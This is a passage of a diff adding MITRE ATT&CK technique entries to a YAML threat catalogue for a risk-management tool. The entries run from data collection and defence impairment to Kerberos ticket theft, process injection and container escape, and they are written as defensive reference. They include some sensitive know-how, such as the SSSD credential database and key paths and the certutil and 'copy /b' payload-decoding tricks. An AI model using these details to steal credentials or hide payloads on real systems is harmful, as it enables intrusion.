+ and configuration files or local databases, to find files of interest and sensitive + data prior to Exfiltration. + + + Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), + such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network + Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality + to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) + Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) + on the local system. + + https://attack.mitre.org/techniques/T1005' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1140 + name: T1140 - Deobfuscate/Decode Files or Information + provider: MITRE ATT&CK + description: 'Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) + to hide artifacts of an intrusion from analysis. They may require separate mechanisms + to decode or deobfuscate that information depending on how they intend to use + it. Methods for doing that include built-in functionality of malware or by using + utilities present on the system. + + + One such example is the use of [certutil](https://attack.mitre.org/software/S0160) + to decode a remote access tool portable executable file that has been hidden + inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi + Arabia) Another example is using the Windows copy /b command to + reassemble binary fragments into a malicious payload.(Citation: Carbon Black + Obfuscation Sept 2016) + + + Sometimes a user''s action may be required to open it for deobfuscation or decryption + as part of [User Execution](https://attack.mitre.org/techniques/T1204). The + user may also be required to input a password to open a password protected compressed/encrypted + file that was provided by the adversary. (Citation: Volexity PowerDuke November + 2016) + + https://attack.mitre.org/techniques/T1140' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1562 + name: T1562 - Impair Defenses + provider: MITRE ATT&CK + description: 'Adversaries may maliciously modify components of a victim environment + in order to hinder or disable defensive mechanisms. This not only involves impairing + preventative defenses, such as firewalls and anti-virus, but also detection + capabilities that defenders can use to audit activity and identify malicious + behavior. This may also span both native defenses as well as supplemental capabilities + installed by users and administrators. + + + Adversaries may also impair routine operations that contribute to defensive + hygiene, such as blocking users from logging out of a computer or stopping it + from being shut down. These restrictions can further enable malicious operations + as well as the continued propagation of incidents.(Citation: Emotet shutdown) + + + Adversaries could also target event aggregation and analysis mechanisms, or + otherwise disrupt these procedures by altering other system components. + + https://attack.mitre.org/techniques/T1562' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1195 + name: T1195 - Supply Chain Compromise + provider: MITRE ATT&CK + description: "Adversaries may manipulate products or product delivery mechanisms\ + \ prior to receipt by a final consumer for the purpose of data or system compromise.\n\ + \nSupply chain compromise can take place at any stage of the supply chain including:\n\ + \n* Manipulation of development tools\n* Manipulation of a development environment\n\ + * Manipulation of source code repositories (public or private)\n* Manipulation\ + \ of source code in open-source dependencies\n* Manipulation of software update/distribution\ + \ mechanisms\n* Compromised/infected system images (multiple cases of removable\ + \ media infected at the factory)(Citation: IBM Storwize)(Citation: Schneider\ + \ Electric USB Malware) \n* Replacement of legitimate software with modified\ + \ versions\n* Sales of modified/counterfeit products to legitimate distributors\n\ + * Shipment interdiction\n\nWhile supply chain compromise can impact any component\ + \ of hardware or software, adversaries looking to gain execution have often\ + \ focused on malicious additions to legitimate software in software distribution\ + \ or update channels.(Citation: Avast CCleaner3 2018)(Citation: Microsoft Dofoil\ + \ 2018)(Citation: Command Five SK 2011) Targeting may be specific to a desired\ + \ victim set or malicious software may be distributed to a broad set of consumers\ + \ but only move on to additional tactics on specific victims.(Citation: Symantec\ + \ Elderwood Sept 2012)(Citation: Avast CCleaner3 2018)(Citation: Command Five\ + \ SK 2011) Popular open source projects that are used as dependencies in many\ + \ applications may also be targeted as a means to add malicious code to users\ + \ of the dependency.(Citation: Trendmicro NPM Compromise)\nhttps://attack.mitre.org/techniques/T1195" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1190 + name: T1190 - Exploit Public-Facing Application + provider: MITRE ATT&CK + description: "Adversaries may attempt to exploit a weakness in an Internet-facing\ + \ host or system to initially access a network. The weakness in the system can\ + \ be a software bug, a temporary glitch, or a misconfiguration.\n\nExploited\ + \ applications are often websites/web servers, but can also include databases\ + \ (like SQL), standard services (like SMB or SSH), network device administration\ + \ and management protocols (like SNMP and Smart Install), and any other system\ + \ with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation:\ + \ CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure\ + \ Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169)\ + \ Depending on the flaw being exploited this may also involve [Exploitation\ + \ for Defense Evasion](https://attack.mitre.org/techniques/T1211). \n\nIf an\ + \ application is hosted on cloud-based infrastructure and/or is containerized,\ + \ then exploiting it may lead to compromise of the underlying instance or container.\ + \ This can allow an adversary a path to access the cloud or container APIs,\ + \ exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611),\ + \ or take advantage of weak identity and access management policies.\n\nAdversaries\ + \ may also exploit edge network infrastructure and related appliances, specifically\ + \ targeting devices that do not support robust host-based defenses.(Citation:\ + \ Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\n\nFor websites\ + \ and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based\ + \ vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)\nhttps://attack.mitre.org/techniques/T1190" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1558 + name: T1558 - Steal or Forge Kerberos Tickets + provider: MITRE ATT&CK + description: "Adversaries may attempt to subvert Kerberos authentication by stealing\ + \ or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003).\ + \ Kerberos is an authentication protocol widely used in modern Windows domain\ + \ environments. In Kerberos environments, referred to as \u201Crealms\u201D\ + , there are three basic participants: client, service, and Key Distribution\ + \ Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request\ + \ access to a service and through the exchange of Kerberos tickets, originating\ + \ from KDC, they are granted access after having successfully authenticated.\ + \ The KDC is responsible for both authentication and ticket granting. Adversaries\ + \ may attempt to abuse Kerberos by stealing tickets or forging tickets to enable\ + \ unauthorized access.\n\nOn Windows, the built-in klist utility\ + \ can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft\ + \ Klist)\n\nLinux systems on Active Directory domains store Kerberos credentials\ + \ locally in the credential cache file referred to as the \"ccache\". The credentials\ + \ are stored in the ccache file while they remain valid and generally while\ + \ a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise\ + \ Linux systems, and derivative distributions, the System Security Services\ + \ Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of\ + \ the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb\ + \ as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey.\ + \ Both files require root access to read. If an adversary is able to access\ + \ the database and key, the credential cache Kerberos blob can be extracted\ + \ and converted into a usable Kerberos ccache file that adversaries may use\ + \ for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The\ + \ ccache file may also be converted into a Windows format using tools such as\ + \ Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation:\ + \ Kekeo)\n\n\nKerberos tickets on macOS are stored in a standard ccache format,\ + \ similar to Linux. By default, access to these ccache entries is federated\ + \ through the KCM daemon process via the Mach RPC protocol, which uses the caller's\ + \ environment to determine access. The storage location for these ccache entries\ + \ is influenced by the /etc/krb5.conf configuration file and the\ + \ KRB5CCNAME environment variable which can specify to save them\ + \ to disk or keep them protected via the KCM daemon. Users can interact with\ + \ ticket storage using kinit, klist, ktutil,\ + \ and kcc built-in binaries or via Apple's native Kerberos framework.\ + \ Adversaries can use open source tools to interact with the ccache files directly\ + \ or to use the Kerberos framework to call lower-level APIs for extracting the\ + \ user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS\ + \ 2019)(Citation: macOS kerberos framework MIT)\nhttps://attack.mitre.org/techniques/T1558" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1555 + name: T1555 - Credentials from Password Stores + provider: MITRE ATT&CK + description: 'Adversaries may search for common password storage locations to + obtain user credentials. Passwords are stored in several places on a system, + depending on the operating system or application holding the credentials. There + are also specific applications and services that store passwords to make them + easier for users to manage and maintain, such as password managers and cloud + secrets vaults. Once credentials are obtained, they can be used to perform lateral + movement and access restricted information. + + https://attack.mitre.org/techniques/T1555' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1567 + name: T1567 - Exfiltration Over Web Service + provider: MITRE ATT&CK + description: 'Adversaries may use an existing, legitimate external Web service + to exfiltrate data rather than their primary command and control channel. Popular + Web services acting as an exfiltration mechanism may give a significant amount + of cover due to the likelihood that hosts within a network are already communicating + with them prior to compromise. Firewall rules may also already exist to permit + traffic to these services. + + + Web service providers also commonly use SSL/TLS encryption, giving adversaries + an added level of protection. + + https://attack.mitre.org/techniques/T1567' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1219 + name: T1219 - Remote Access Software + provider: MITRE ATT&CK + description: "An adversary may use legitimate desktop support and remote access\ + \ software to establish an interactive command and control channel to target\ + \ systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`,\ + \ `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and\ + \ management (RMM) tools, are commonly used as legitimate technical support\ + \ software and may be allowed by application control within a target environment.(Citation:\ + \ Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation:\ + \ CrySyS Blog TeamSpy)\n\nRemote access software may be installed and used post-compromise\ + \ as an alternate communications channel for redundant access or as a way to\ + \ establish an interactive remote desktop session with the target system. They\ + \ may also be used as a component of malware to establish a reverse connection\ + \ or back-connect to a service or adversary controlled system.\n \nAdversaries\ + \ may similarly abuse response features included in EDR and other defensive\ + \ tools that enable remote access.\n\nInstallation of many remote access software\ + \ may also include persistence (e.g., the software's installation routine creates\ + \ a [Windows Service](https://attack.mitre.org/techniques/T1543/003)).\nhttps://attack.mitre.org/techniques/T1219" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1036 + name: T1036 - Masquerading + provider: MITRE ATT&CK + description: 'Adversaries may attempt to manipulate features of their artifacts + to make them appear legitimate or benign to users and/or security tools. Masquerading + occurs when the name or location of an object, legitimate or malicious, is manipulated + or abused for the sake of evading defenses and observation. This may include + manipulating file metadata, tricking users into misidentifying the file type, + and giving legitimate task or service names. + + + Renaming abusable system utilities to evade security monitoring is also a form + of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS + Main Site) Masquerading may also include the use of [Proxy](https://attack.mitre.org/techniques/T1090) + or VPNs to disguise IP addresses, which can allow adversaries to blend in with + normal network traffic and bypass conditional access policies or anti-abuse + protections. + + https://attack.mitre.org/techniques/T1036' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1552 + name: T1552 - Unsecured Credentials + provider: MITRE ATT&CK + description: 'Adversaries may search compromised systems to find and obtain insecurely + stored credentials. These credentials can be stored and/or misplaced in many + locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), + operating system or application-specific repositories (e.g. [Credentials in + Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized + files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)). + + https://attack.mitre.org/techniques/T1552' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1659 + name: T1659 - Content Injection + provider: MITRE ATT&CK + description: 'Adversaries may gain access and continuously communicate with victims + by injecting malicious content into systems through online network traffic. + Rather than luring victims to malicious payloads hosted on a compromised website + (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) followed + by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)), adversaries + may initially access victims through compromised data-transfer channels where + they can manipulate traffic and/or inject their own content. These compromised + online network channels may also be used to deliver additional payloads (i.e., + [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and other + data to already compromised systems.(Citation: ESET MoustachedBouncer) + + + Adversaries may inject content to victim systems in various ways, including: + + + * From the middle, where the adversary is in-between legitimate online client-server + communications (**Note:** this is similar but distinct from [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557), + which describes AiTM activity solely within an enterprise environment) (Citation: + Kaspersky Encyclopedia MiTM) + + * From the side, where malicious content is injected and races to the client + as a fake response to requests of a legitimate online server (Citation: Kaspersky + ManOnTheSide) + + + Content injection is often the result of compromised upstream communication + channels, for example at the level of an internet service provider (ISP) as + is the case with "lawful interception."(Citation: Kaspersky ManOnTheSide)(Citation: + ESET MoustachedBouncer)(Citation: EFF China GitHub Attack) + + https://attack.mitre.org/techniques/T1659' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1055 + name: T1055 - Process Injection + provider: MITRE ATT&CK + description: "Adversaries may inject code into processes in order to evade process-based\ + \ defenses as well as possibly elevate privileges. Process injection is a method\ + \ of executing arbitrary code in the address space of a separate live process.\ + \ Running code in the context of another process may allow access to the process's\ + \ memory, system/network resources, and possibly elevated privileges. Execution\ + \ via process injection may also evade detection from security products since\ + \ the execution is masked under a legitimate process. \n\nThere are many different\ + \ ways to inject code into a process, many of which abuse legitimate functionalities.\ + \ These implementations exist for every major OS but are typically platform\ + \ specific. \n\nMore sophisticated samples may perform multiple process injections\ + \ to segment modules and further evade detection, utilizing named pipes or other\ + \ inter-process communication (IPC) mechanisms as a communication channel.\n\ + https://attack.mitre.org/techniques/T1055" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1205 + name: T1205 - Traffic Signaling + provider: MITRE ATT&CK + description: 'Adversaries may use traffic signaling to hide open ports or other + malicious functionality used for persistence or command and control. Traffic + signaling involves the use of a magic value or sequence that must be sent to + a system to trigger a special response, such as opening a closed port or executing + a malicious task. This may take the form of sending a series of packets with + certain characteristics before a port will be opened that the adversary can + use for command and control. Usually this series of packets consists of attempted + connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), + but can involve unusual flags, specific strings, or other unique characteristics. + After the sequence is completed, opening a port may be accomplished by the host-based + firewall, but could also be implemented by custom software. + + + Adversaries may also communicate with an already open port, but the service + listening on that port will only respond to commands or trigger other malicious + functionality if passed the appropriate magic value(s). + + + The observation of the signal packets to trigger the communication can be conducted + through different methods. One means, originally implemented by Cd00r (Citation: + Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets + in question. Another method leverages raw sockets, which enables the malware + to use ports that are already open for use by other programs. + + + On network devices, adversaries may use crafted packets to enable [Network Device + Authentication](https://attack.mitre.org/techniques/T1556/004) for standard + services offered by the device such as telnet. Such signaling may also be used + to open a closed service port such as telnet, or to trigger module modification + of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries + may use crafted packets to attempt to connect to one or more (open or closed) + ports, but may also attempt to connect to a router interface, broadcast, and + network address IP on the same port in order to achieve their goals and objectives.(Citation: + Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco + Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, + adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) + due to the monolithic nature of the architecture. + + + Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. + Wake-on-LAN is a hardware feature that allows a powered down system to be powered + on, or woken up, by sending a magic packet to it. Once the system is powered + on, it may become a target for lateral movement.(Citation: Bleeping Computer + - Ryuk WoL)(Citation: AMD Magic Packet) + + https://attack.mitre.org/techniques/T1205' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1218 + name: T1218 - System Binary Proxy Execution + provider: MITRE ATT&CK + description: 'Adversaries may bypass process and/or signature-based defenses by + proxying execution of malicious content with signed, or otherwise trusted, binaries. + Binaries used in this technique are often Microsoft-signed files, indicating + that they have been either downloaded from Microsoft or are already native in + the operating system.(Citation: LOLBAS Project) Binaries signed with trusted + digital certificates can typically execute on Windows systems protected by digital + signature validation. Several Microsoft signed binaries that are default on + Windows installations can be used to proxy execution of other files or commands. + + + Similarly, on Linux systems adversaries may abuse trusted binaries such as split + to proxy execution of malicious commands.(Citation: split man page)(Citation: + GTFO split) + + https://attack.mitre.org/techniques/T1218' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1620 + name: T1620 - Reflective Code Loading + provider: MITRE ATT&CK + description: "Adversaries may reflectively load code into a process in order to\ + \ conceal the execution of malicious payloads. Reflective loading involves allocating\ + \ then executing payloads directly within the memory of the process, vice creating\ + \ a thread or process backed by a file path on disk. Reflectively loaded payloads\ + \ may be compiled binaries, anonymous files (only present in RAM), or just snubs\ + \ of fileless executable code (ex: position-independent shellcode).(Citation:\ + \ Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF\ + \ Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL)\n\nReflective code\ + \ injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055)\ + \ except that the \u201Cinjection\u201D loads code into the processes\u2019\ + \ own memory instead of that of a separate process. Reflective loading may evade\ + \ process-based detections since the execution of the arbitrary code may be\ + \ masked within a legitimate or otherwise benign process. Reflectively loading\ + \ payloads directly into memory may also avoid creating files or other artifacts\ + \ on disk, while also enabling malware to keep these payloads encrypted (or\ + \ otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation:\ + \ 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)\n\ + https://attack.mitre.org/techniques/T1620" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1611 + name: T1611 - Escape to Host + provider: MITRE ATT&CK + description: "Adversaries may break out of a container to gain access to the underlying\ + \ host. This can allow an adversary access to other containerized resources\ + \ from the host level or to the host itself. In principle, containerized resources\ + \ should provide a clear separation of application functionality and be isolated\ + \ from the host environment.(Citation: Docker Overview)\n\nThere are multiple\ + \ ways an adversary may escape to a host environment. Examples include creating\ + \ a container configured to mount the host\u2019s filesystem using the bind\ + \ parameter, which allows the adversary to drop payloads and execute control\ + \ utilities such as cron on the host; utilizing a privileged container to run\ + \ commands or load a malicious kernel module on the underlying host; or abusing\ + \ system calls such as `unshare` and `keyctl` to escalate privileges and steal\ + \ secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation:\ + \ Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes\ + \ Container Escape)(Citation: Keyctl-unmask)\n\nAdditionally, an adversary may\ + \ be able to exploit a compromised container with a mounted container management\ + \ socket, such as `docker.sock`, to break out of the container via a [Container\ + \ Administration Command](https://attack.mitre.org/techniques/T1609).(Citation:\ + \ Container Escape) Adversaries may also escape via [Exploitation for Privilege\ + \ Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting\ + \ vulnerabilities in global symbolic links in order to access the root directory\ + \ of a host machine.(Citation: Windows Server Containers Are Open)\n\nGaining\ + \ access to the host may provide the adversary with the opportunity to achieve\ + \ follow-on objectives, such as establishing persistence, moving laterally within\ + \ the environment, or setting up a command and control channel on the host.\n\ + https://attack.mitre.org/techniques/T1611" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1010 + name: T1010 - Application Window Discovery + provider: MITRE ATT&CK + description: 'Adversaries may attempt to get a listing of open application windows. + Window listings could convey information about how the system is used.(Citation: + Prevailion DarkWatchman 2021) For example, information about application windows + could be used identify potential data to collect as well as identifying security + tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) + to evade.(Citation: ESET Grandoreiro April 2020) + + + Adversaries typically abuse system features for this type of enumeration. For + example, they may gather information through native system features such as + [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) + commands and [Native API](https://attack.mitre.org/techniques/T1106) functions. + + https://attack.mitre.org/techniques/T1010' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1029 + name: T1029 - Scheduled Transfer + provider: MITRE ATT&CK + description: 'Adversaries may schedule data exfiltration to be performed only + at certain times of day or at certain intervals. This could be done to blend + traffic patterns with normal activity or availability. + + + When scheduled exfiltration is used, other exfiltration techniques likely apply + as well to transfer the information out of the network, such as [Exfiltration + Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration + Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). + + https://attack.mitre.org/techniques/T1029' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1525 + name: T1525 - Implant Internal Image + provider: MITRE ATT&CK + description: "Adversaries may implant cloud or container images with malicious\ + \ code to establish persistence after gaining access to an environment. Amazon\ + \ Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP)\ + \ Images, and Azure Images as well as popular container runtimes such as Docker\ + \ can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001),\ + \ this technique focuses on adversaries implanting an image in a registry within\ + \ a victim\u2019s environment. Depending on how the infrastructure is provisioned,\ + \ this could provide persistent access if the infrastructure provisioning tool\ + \ is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image\ + \ Backdoor Technique Sept 2019)\n\nA tool has been developed to facilitate planting\ + \ backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September\ + \ 2019) If an adversary has access to a compromised AWS instance, and permissions\ + \ to list the available container images, they may implant a backdoor such as\ + \ a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino\ + \ Labs Cloud Image Backdoor Technique Sept 2019)\nhttps://attack.mitre.org/techniques/T1525" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1572 + name: T1572 - Protocol Tunneling + provider: MITRE ATT&CK + description: "Adversaries may tunnel network communications to and from a victim\ + \ system within a separate protocol to avoid detection/network filtering and/or\ + \ enable access to otherwise unreachable systems. Tunneling involves explicitly\ + \ encapsulating a protocol within another. This behavior may conceal malicious\ + \ traffic by blending in with existing traffic and/or provide an outer layer\ + \ of encryption (similar to a VPN). Tunneling could also enable routing of network\ + \ packets that would otherwise not reach their intended destination, such as\ + \ SMB, RDP, or other traffic that would be filtered by network appliances or\ + \ not routed over the Internet. \n\nThere are various means to encapsulate a\ + \ protocol within another protocol. For example, adversaries may perform SSH\ + \ tunneling (also known as SSH port forwarding), which involves forwarding arbitrary\ + \ data over an encrypted SSH tunnel.(Citation: SSH Tunneling) \n\n[Protocol\ + \ Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by\ + \ adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568).\ + \ Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be\ + \ encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua\ + \ JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)\ + \ in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or\ + \ [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to\ + \ further conceal C2 communications and infrastructure.\nhttps://attack.mitre.org/techniques/T1572" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1550 + name: T1550 - Use Alternate Authentication Material + provider: MITRE ATT&CK + description: "Adversaries may use alternate authentication material, such as password\ + \ hashes, Kerberos tickets, and application access tokens, in order to move\ + \ laterally within an environment and bypass normal system access controls.\ + \ \n\nAuthentication processes generally require a valid identity (e.g., username)\ + \ along with one or more authentication factors (e.g., password, pin, physical\ + \ smart card, token generator, etc.). Alternate authentication material is legitimately\ + \ generated by systems after a user or application successfully authenticates\ + \ by providing a valid identity and the required authentication factor(s). Alternate\ + \ authentication material may also be generated during the identity creation\ + \ process.(Citation: NIST Authentication)(Citation: NIST MFA)\n\nCaching alternate\ + \ authentication material allows the system to verify an identity has successfully\ + \ authenticated without asking the user to reenter authentication factor(s).\ + \ Because the alternate authentication must be maintained by the system\u2014\ + either in memory or on disk\u2014it may be at risk of being stolen through [Credential\ + \ Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate\ + \ authentication material, adversaries are able to bypass system access controls\ + \ and authenticate to systems without knowing the plaintext password or any\ + \ additional authentication factors.\nhttps://attack.mitre.org/techniques/T1550" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1011 + name: T1011 - Exfiltration Over Other Network Medium + provider: MITRE ATT&CK + description: 'Adversaries may attempt to exfiltrate data over a different network + medium than the command and control channel. If the command and control network + is a wired Internet connection, the exfiltration may occur, for example, over + a WiFi connection, modem, cellular data connection, Bluetooth, or another radio + frequency (RF) channel. + + + Adversaries may choose to do this if they have sufficient access or proximity, + and the connection might not be secured or defended as well as the primary Internet-connected + channel because it is not routed through the same enterprise network. + + https://attack.mitre.org/techniques/T1011' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1589 + name: T1589 - Gather Victim Identity Information + provider: MITRE ATT&CK + description: 'Adversaries may gather information about the victim''s identity + that can be used during targeting. Information about identities may include + a variety of details, including personal data (ex: employee names, email addresses, + etc.) as well as sensitive details such as credentials. + + + Adversaries may gather this information in various ways, such as direct elicitation + via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information + about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) + such as probing and analyzing responses from authentication services that may + reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) Information + about victims may also be exposed to adversaries via online or other accessible + data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) + or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: + OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify + Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: + GitHub Gitrob)(Citation: CNET Leaks) + + + Gathering this information may reveal opportunities for other forms of reconnaissance + (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) + or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing + operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), + and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) + or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). + + https://attack.mitre.org/techniques/T1589' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1560 + name: T1560 - Archive Collected Data + provider: MITRE ATT&CK + description: 'An adversary may compress and/or encrypt data that is collected + prior to exfiltration. Compressing the data can help to obfuscate the collected + data and minimize the amount of data sent over the network. Encryption can be + used to hide information that is being exfiltrated from detection or make exfiltration + less conspicuous upon inspection by a defender. + + + Both compression and encryption are done prior to exfiltration, and can be performed + using a utility, 3rd party library, or custom method. + + https://attack.mitre.org/techniques/T1560' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1185 + name: T1185 - Browser Session Hijacking + provider: MITRE ATT&CK + description: 'Adversaries may take advantage of security vulnerabilities and inherent + functionality in browser software to change content, modify user-behaviors, + and intercept information as part of various browser session hijacking techniques.(Citation: + Wikipedia Man in the Browser) + + + A specific example is when an adversary injects software into a browser that + allows them to inherit cookies, HTTP sessions, and SSL client certificates of + a user then use the browser as a way to pivot into an authenticated intranet.(Citation: + Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based + behaviors such as pivoting may require specific process permissions, such as + SeDebugPrivilege and/or high-integrity/administrator rights. + + + Another example involves pivoting browser traffic from the adversary''s browser + through the user''s browser by setting up a proxy which will redirect web traffic. + This does not alter the user''s traffic in any way, and the proxy connection + can be severed as soon as the browser is closed. The adversary assumes the security + context of whichever browser process the proxy is injected into. Browsers typically + create a new process for each tab that is opened and permissions and certificates + are separated accordingly. With these permissions, an adversary could potentially + browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) + or webmail, that is accessible through the browser and which the browser has + sufficient permissions. Browser pivoting may also bypass security provided by + 2-factor authentication.(Citation: cobaltstrike manual) + + https://attack.mitre.org/techniques/T1185' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1021 + name: T1021 - Remote Services + provider: MITRE ATT&CK + description: "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078)\ + \ to log into a service that accepts remote connections, such as telnet, SSH,\ + \ and VNC. The adversary may then perform actions as the logged-on user.\n\n\ + In an enterprise environment, servers and workstations can be organized into\ + \ domains. Domains provide centralized identity management, allowing users to\ + \ login using one set of credentials across the entire network. If an adversary\ + \ is able to obtain a set of valid domain credentials, they could login to many\ + \ different machines using remote access protocols such as secure shell (SSH)\ + \ or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet\ + \ Remote Desktop Services) They could also login to accessible SaaS or IaaS\ + \ services, such as those that federate their identities to the domain. \n\n\ + Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072)\ + \ and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021)\ + \ to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is\ + \ native software used for remote management. ARD leverages a blend of protocols,\ + \ including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the\ + \ screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004)\ + \ for secure file transfer.(Citation: Remote Management MDM macOS)(Citation:\ + \ Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin\ + \ Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code\ + \ execution and perform lateral movement. In versions of macOS prior to 10.14,\ + \ an adversary can escalate an SSH session to an ARD session which enables an\ + \ adversary to accept TCC (Transparency, Consent, and Control) prompts without\ + \ user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote\ + \ Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop\ + \ commands)\nhttps://attack.mitre.org/techniques/T1021" + version: '1.0' + - urn: 